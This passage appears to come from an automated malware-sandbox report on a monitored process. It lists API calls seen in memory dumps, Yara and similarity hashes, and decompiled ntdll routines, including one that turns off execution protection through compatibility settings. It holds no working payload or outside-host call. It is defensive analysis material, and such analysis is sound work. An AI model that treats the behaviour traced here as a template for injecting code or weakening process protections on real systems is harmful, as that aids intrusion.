                                                                                                                          • RtlAllocateHeap.NTDLL(00E844F6,?,?,oL,?,00E844F6,?,?,?,?,?,00000000,00000000,?), ref: 00E8A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oL
                                                                                                                          • API String ID: 1279760036-2024872671
                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction ID: 799bd89921fc9f1e21c1130570471bb64ce5ad009ba8c0599ea5cd65d9a2750c
                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction Fuzzy Hash: 4EE012B1200208ABDB14EF99DC41EA777ADAF88650F158559BA0C6B242C630F9108BB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A230, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E73AF8), ref: 00E8A25D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction ID: 3045510c23a91ad7e9fbc03f29e06de55e1e84fe55c8daa1702e3eadf648bade
                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction Fuzzy Hash: 06E012B1200208ABDB18EF99DC49EA777ADAF88750F018559BA0C6B242C630E9108BB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E7ACB3, Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E7AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: e34673b94376c383aa84a060d2e86ab8fba2cab6c9ef6ffc645289d1e2f3457c
                                                                                                                          • Instruction ID: e919120b2c0a51a5a77942612efc9448b7a5a500f545c5eb4e6d1106805ac0f9
                                                                                                                          • Opcode Fuzzy Hash: e34673b94376c383aa84a060d2e86ab8fba2cab6c9ef6ffc645289d1e2f3457c
                                                                                                                          • Instruction Fuzzy Hash: 5D01D875D4010DEBCF10DBA4D881FDDB7B8AB45318F10C2E9E90DAB151F231A659CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E7ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E7AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction ID: 32d30445f3391263e75b770423eb19b4784b2ae6dc88e7cef429514da8b09144
                                                                                                                          • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction Fuzzy Hash: 070112B5D4020DA7DB10EAE4EC42FDEB3B89B54308F1485A5A90CA7141F631EB14CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A262, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 00E8A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: bded9d61337eca83a0f0f92b5cc5d324ec87e67d2484e4639a1d1ce01c6b17d8
                                                                                                                          • Instruction ID: 573859ab9cfec179fdd6ced8d10f5e4a6ce6418166afb6bbc379038e1ae7ffa0
                                                                                                                          • Opcode Fuzzy Hash: bded9d61337eca83a0f0f92b5cc5d324ec87e67d2484e4639a1d1ce01c6b17d8
                                                                                                                          • Instruction Fuzzy Hash: C9018FB62001086FC714DF98DC84EDB73ADEF88300F108159BA5C9B651C630E901CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A381, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E7F192,00E7F192,?,00000000,?,?), ref: 00E8A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: e4d9f5f8d602dbc398cf9610ffa063e1a46322ac3ed27cc318259b2a9b9c3902
                                                                                                                          • Instruction ID: 8ed3385abf80f33294d19f2f16bb37d6ce4d767ab61cc8bc88ef63519c974b34
                                                                                                                          • Opcode Fuzzy Hash: e4d9f5f8d602dbc398cf9610ffa063e1a46322ac3ed27cc318259b2a9b9c3902
                                                                                                                          • Instruction Fuzzy Hash: 85F0BEB12001443FEA10EF689C86EEB3B6ADF84754F0581A6F90DA7202CA35E91187B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E7F192,00E7F192,?,00000000,?,?), ref: 00E8A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction ID: f31eb63d499b256075d38b36afd5f88836fbfd639fb69b00da67dfb915f7a379
                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction Fuzzy Hash: 9EE01AB12002086BDB10EF49DC85EE737ADAF88650F018165BA0C67241CA34E8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 00E8A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
                                                                                                                          • Instruction ID: 7914ca0fabc5d001980e45ad6fb485ce14398e2c40c43460c48816124f04fd2c
                                                                                                                          • Opcode Fuzzy Hash: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
                                                                                                                          • Instruction Fuzzy Hash: ADD012716002147BD620EB98DC85FD7779DDF48750F058065BA1C6B241C531BA0087E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A1B6, Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00E844F6,?,?,oL,?,00E844F6,?,?,?,?,?,00000000,00000000,?), ref: 00E8A21D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: acd4ac879795ac88126d437e28d31ad21b67696f3ae5b45ffb214866f0c54eba
                                                                                                                          • Instruction ID: dc8f67dc1b6914cf98433bc5ee2d782bfc7769d65c3571660a079da2d606a099
                                                                                                                          • Opcode Fuzzy Hash: acd4ac879795ac88126d437e28d31ad21b67696f3ae5b45ffb214866f0c54eba
                                                                                                                          • Instruction Fuzzy Hash: 67D0C9B4200108AB9710FF58E8809AB73AAAF882147159516FC1D53211C631D8208BB2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 895b475e27e264aa42393c17e4a2836775fe821b550e0bb88420cd7413b37d20
                                                                                                                          • Instruction ID: cbacf720d08421e57e5551aff4fb987b7880b0a201cdf2054cafa8619c703ff8
                                                                                                                          • Opcode Fuzzy Hash: 895b475e27e264aa42393c17e4a2836775fe821b550e0bb88420cd7413b37d20
                                                                                                                          • Instruction Fuzzy Hash: 29B09B71D414C5C5E715E76147087277944BBD1741F16C056D1024655A4778C0A1F6B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 03687CC0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 198COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 41%
                                                                                                                          			E03687CC0(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t60;
				signed int _t65;
				void* _t70;
				void* _t73;
				signed int _t86;
				void* _t92;
				signed int _t94;
				intOrPtr _t101;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t115;
				intOrPtr _t116;
				signed char _t117;
				void* _t118;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;

				_t101 = _a8;
				_t120 = _a4;
				_t121 = 0;
				_t104 = _t101 + 0x2e;
				_v24 = 8;
				_v16 = _t104;
				if( *_t120 == 0) {
					__eflags =  *(_t120 + 2);
					if( *(_t120 + 2) != 0) {
						goto L1;
					}
					__eflags =  *(_t120 + 4);
					if( *(_t120 + 4) != 0) {
						goto L1;
					}
					__eflags =  *(_t120 + 6);
					if( *(_t120 + 6) != 0) {
						goto L1;
					}
					_t117 =  *(_t120 + 0xc) & 0x0000ffff;
					_v20 = _t117 >> 8;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L1;
					}
					_t86 =  *(_t120 + 8) & 0x0000ffff;
					__eflags = _t86;
					if(_t86 != 0) {
						_v12 = 0xffff;
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L1;
						}
						__eflags =  *(_t120 + 0xa);
						if( *(_t120 + 0xa) != 0) {
							goto L1;
						}
						__eflags = _t104 - _t101;
						_push( *(_t120 + 0xf) & 0x000000ff);
						_push( *(_t120 + 0xe) & 0x000000ff);
						_push(_v20 & 0x000000ff);
						_t92 = E036D6B30(_t101, _t104 - _t101, "::ffff:0:%u.%u.%u.%u", _t117 & 0x000000ff);
						L29:
						return _t92 + _t101;
					}
					_t94 =  *(_t120 + 0xa) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 == 0) {
						_t118 = 0x36648a4;
						L27:
						_push( *(_t120 + 0xf) & 0x000000ff);
						_push( *(_t120 + 0xe) & 0x000000ff);
						_push(_v20 & 0x000000ff);
						_push( *(_t120 + 0xc) & 0xff);
						_t92 = E036D6B30(_t101, _t104 - _t101, "::%hs%u.%u.%u.%u", _t118);
						goto L29;
					}
					__eflags = _t94 - 0xffff;
					if(_t94 != 0xffff) {
						goto L1;
					}
					_t118 = 0x367d700;
					goto L27;
				}
				L1:
				_t105 = _t121;
				_t60 = _t121;
				_v8 = _t105;
				_v20 = _t60;
				if(( *(_t120 + 8) & 0x0000fffd) == 0) {
					__eflags =  *(_t120 + 0xa) - 0xfe5e;
					if( *(_t120 + 0xa) == 0xfe5e) {
						_v24 = 6;
					}
				}
				_t115 = _t121;
				_t102 = _t60;
				do {
					if( *((intOrPtr*)(_t120 + _t115 * 2)) == _t121) {
						__eflags = _t115 - _t60 + 1 - _v8 - _t102;
						_t60 = _v20;
						if(__eflags <= 0) {
							_t105 = _v8;
						} else {
							_t49 = _t115 + 1; // 0x1
							_t105 = _t49;
							_t102 = _t60;
							_v8 = _t105;
						}
					} else {
						_t13 = _t115 + 1; // 0x1
						_t60 = _t13;
						_v20 = _t60;
					}
					_t115 = _t115 + 1;
				} while (_t115 < _v24);
				_v12 = _t102;
				_t103 = _a8;
				if(_t105 - _t102 > 1) {
					_t65 = _v12;
				} else {
					_t105 = _t121;
					_t65 = _t121;
					_v8 = _t105;
					_v12 = _t65;
				}
				do {
					if(_t121 < _t105) {
						__eflags = _t65 - _t121;
						if(_t65 > _t121) {
							goto L9;
						}
						_push("::");
						_push(_v16 - _t103);
						_push(_t103);
						_t70 = E036D6B30();
						_t105 = _v8;
						_t122 = _t122 + 0xc;
						_t121 = _t105 - 1;
						goto L13;
					}
					L9:
					if(_t121 != 0 && _t121 != _t105) {
						_push(":");
						_push(_v16 - _t103);
						_push(_t103);
						_t73 = E036D6B30();
						_t122 = _t122 + 0xc;
						_t103 = _t103 + _t73;
					}
					_t70 = E036D6B30(_t103, _v16 - _t103, "%x",  *(_t120 + _t121 * 2) & 0x0000ffff);
					_t105 = _v8;
					_t122 = _t122 + 0x10;
					L13:
					_t116 = _v24;
					_t103 = _t103 + _t70;
					_t65 = _v12;
					_t121 = _t121 + 1;
				} while (_t121 < _t116);
				if(_t116 < 8) {
					_push( *(_t120 + 0xf) & 0x000000ff);
					_push( *(_t120 + 0xe) & 0x000000ff);
					_push( *(_t120 + 0xd) & 0x000000ff);
					_t103 = _t103 + E036D6B30(_t103, _v16 - _t103, ":%u.%u.%u.%u",  *(_t120 + 0xc) & 0x000000ff);
				}
				return _t103;
			}



























                                                                                                                          0x03687cc9
                                                                                                                          0x03687cce
                                                                                                                          0x03687cd1
                                                                                                                          0x03687cd3
                                                                                                                          0x03687cd6
                                                                                                                          0x03687cdd
                                                                                                                          0x03687ce3
                                                                                                                          0x036e2bbb
                                                                                                                          0x036e2bbf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2bc5
                                                                                                                          0x036e2bc9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2bcf
                                                                                                                          0x036e2bd3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2bd9
                                                                                                                          0x036e2be2
                                                                                                                          0x036e2be5
                                                                                                                          0x036e2be8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2bee
                                                                                                                          0x036e2bf2
                                                                                                                          0x036e2bf5
                                                                                                                          0x036e2c74
                                                                                                                          0x036e2c7b
                                                                                                                          0x036e2c7f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2c85
                                                                                                                          0x036e2c89
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2c4b
                                                                                                                          0x036e2c4d
                                                                                                                          0x036e2c52
                                                                                                                          0x036e2c59
                                                                                                                          0x036e2c65
                                                                                                                          0x036e2c6d
                                                                                                                          0x00000000
                                                                                                                          0x036e2c6d
                                                                                                                          0x036e2bf7
                                                                                                                          0x036e2bfb
                                                                                                                          0x036e2bfe
                                                                                                                          0x036e2c15
                                                                                                                          0x036e2c1a
                                                                                                                          0x036e2c20
                                                                                                                          0x036e2c25
                                                                                                                          0x036e2c2c
                                                                                                                          0x036e2c34
                                                                                                                          0x036e2c3d
                                                                                                                          0x00000000
                                                                                                                          0x036e2c42
                                                                                                                          0x036e2c05
                                                                                                                          0x036e2c08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2c0e
                                                                                                                          0x00000000
                                                                                                                          0x036e2c0e
                                                                                                                          0x03687ce9
                                                                                                                          0x03687cee
                                                                                                                          0x03687cf0
                                                                                                                          0x03687cf2
                                                                                                                          0x03687cf5
                                                                                                                          0x03687cfc
                                                                                                                          0x036e2c96
                                                                                                                          0x036e2c9a
                                                                                                                          0x036e2ca0
                                                                                                                          0x036e2ca0
                                                                                                                          0x036e2c9a
                                                                                                                          0x03687d02
                                                                                                                          0x03687d04
                                                                                                                          0x03687d06
                                                                                                                          0x03687d0a
                                                                                                                          0x036e2cb6
                                                                                                                          0x036e2cb8
                                                                                                                          0x036e2cbb
                                                                                                                          0x036e2cca
                                                                                                                          0x036e2cbd
                                                                                                                          0x036e2cbd
                                                                                                                          0x036e2cbd
                                                                                                                          0x036e2cc0
                                                                                                                          0x036e2cc2
                                                                                                                          0x036e2cc2
                                                                                                                          0x03687d10
                                                                                                                          0x03687d10
                                                                                                                          0x03687d10
                                                                                                                          0x03687d13
                                                                                                                          0x03687d13
                                                                                                                          0x03687d16
                                                                                                                          0x03687d17
                                                                                                                          0x03687d1e
                                                                                                                          0x03687d23
                                                                                                                          0x03687d29
                                                                                                                          0x03687d9f
                                                                                                                          0x03687d2b
                                                                                                                          0x03687d2b
                                                                                                                          0x03687d2d
                                                                                                                          0x03687d2f
                                                                                                                          0x03687d32
                                                                                                                          0x03687d32
                                                                                                                          0x03687d35
                                                                                                                          0x03687d37
                                                                                                                          0x036e2cd2
                                                                                                                          0x036e2cd4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e2cdd
                                                                                                                          0x036e2ce4
                                                                                                                          0x036e2ce5
                                                                                                                          0x036e2ce6
                                                                                                                          0x036e2ceb
                                                                                                                          0x036e2cee
                                                                                                                          0x036e2cf1
                                                                                                                          0x00000000
                                                                                                                          0x036e2cf1
                                                                                                                          0x03687d3d
                                                                                                                          0x03687d3f
                                                                                                                          0x03687d48
                                                                                                                          0x03687d4f
                                                                                                                          0x03687d50
                                                                                                                          0x03687d51
                                                                                                                          0x03687d56
                                                                                                                          0x03687d59
                                                                                                                          0x03687d59
                                                                                                                          0x03687d73
                                                                                                                          0x03687d78
                                                                                                                          0x03687d7b
                                                                                                                          0x03687d7e
                                                                                                                          0x03687d7e
                                                                                                                          0x03687d81
                                                                                                                          0x03687d83
                                                                                                                          0x03687d86
                                                                                                                          0x03687d87
                                                                                                                          0x03687d8e
                                                                                                                          0x036e2cfd
                                                                                                                          0x036e2d02
                                                                                                                          0x036e2d07
                                                                                                                          0x036e2d21
                                                                                                                          0x036e2d21
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ___swprintf_l
                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                          • Opcode ID: 652ef9789af4e8f0938b5f8ab0f125375a6fd1592526edd8749ee0428679389a
                                                                                                                          • Instruction ID: 66e904f862941daf62612d5d8cf70a92a0b97bf6166a6da23e080136a1c6e422
                                                                                                                          • Opcode Fuzzy Hash: 652ef9789af4e8f0938b5f8ab0f125375a6fd1592526edd8749ee0428679389a
                                                                                                                          • Instruction Fuzzy Hash: 076124B5B00126AFCB10EFA8C99097EF7B8FF09604B64866AE854D7341D731DE54C7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036840FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E036840FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x377d360 ^ _t107;
				_v8 =  *0x377d360 ^ _t107;
				_t105 = __ecx;
				if( *0x37784d4 == 0) {
					L5:
					return E036CB640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E0369E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E036842EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E036841EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E036C96C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E0368429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E03715720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E036CFA60( &_v548, 0, 0x214);
						_t106 =  *0x37784d4;
						_t110 = _t108 + 0x20;
						 *0x377b1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x37784d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E036CB75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E03715720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E036D1480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E03715720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E036D1150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E03715720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E03703E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E03715720();
						goto L15;
					}
					L8:
					_t56 = E036841F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                          0x0368410d
                                                                                                                          0x0368410f
                                                                                                                          0x0368411c
                                                                                                                          0x0368411e
                                                                                                                          0x03684158
                                                                                                                          0x03684168
                                                                                                                          0x03684168
                                                                                                                          0x03684126
                                                                                                                          0x03684130
                                                                                                                          0x0368413c
                                                                                                                          0x036e04a2
                                                                                                                          0x03684142
                                                                                                                          0x0368414b
                                                                                                                          0x0368414b
                                                                                                                          0x0368414f
                                                                                                                          0x0368416b
                                                                                                                          0x03684171
                                                                                                                          0x03684176
                                                                                                                          0x03684178
                                                                                                                          0x036841d0
                                                                                                                          0x036841d2
                                                                                                                          0x036841d3
                                                                                                                          0x036841a7
                                                                                                                          0x036841ae
                                                                                                                          0x036841b0
                                                                                                                          0x036841db
                                                                                                                          0x036841b2
                                                                                                                          0x036841b8
                                                                                                                          0x036841bf
                                                                                                                          0x036841c1
                                                                                                                          0x036841c1
                                                                                                                          0x036841c1
                                                                                                                          0x036841c3
                                                                                                                          0x036841c5
                                                                                                                          0x036841df
                                                                                                                          0x036841e2
                                                                                                                          0x036841e2
                                                                                                                          0x036841c7
                                                                                                                          0x036841c9
                                                                                                                          0x036e0628
                                                                                                                          0x036e0628
                                                                                                                          0x036e0630
                                                                                                                          0x036e0631
                                                                                                                          0x036e0633
                                                                                                                          0x036e0635
                                                                                                                          0x036e0635
                                                                                                                          0x00000000
                                                                                                                          0x036841c9
                                                                                                                          0x0368417d
                                                                                                                          0x03684183
                                                                                                                          0x03684189
                                                                                                                          0x0368418e
                                                                                                                          0x03684190
                                                                                                                          0x036e04a9
                                                                                                                          0x036e04af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e04b5
                                                                                                                          0x036e04c8
                                                                                                                          0x036e04d5
                                                                                                                          0x036e04e5
                                                                                                                          0x036e04ea
                                                                                                                          0x036e04f6
                                                                                                                          0x036e0518
                                                                                                                          0x036e051e
                                                                                                                          0x036e0520
                                                                                                                          0x036e0522
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e0528
                                                                                                                          0x036e052e
                                                                                                                          0x036e0530
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e053b
                                                                                                                          0x036e053d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e0545
                                                                                                                          0x036e054c
                                                                                                                          0x036e054e
                                                                                                                          0x036e0623
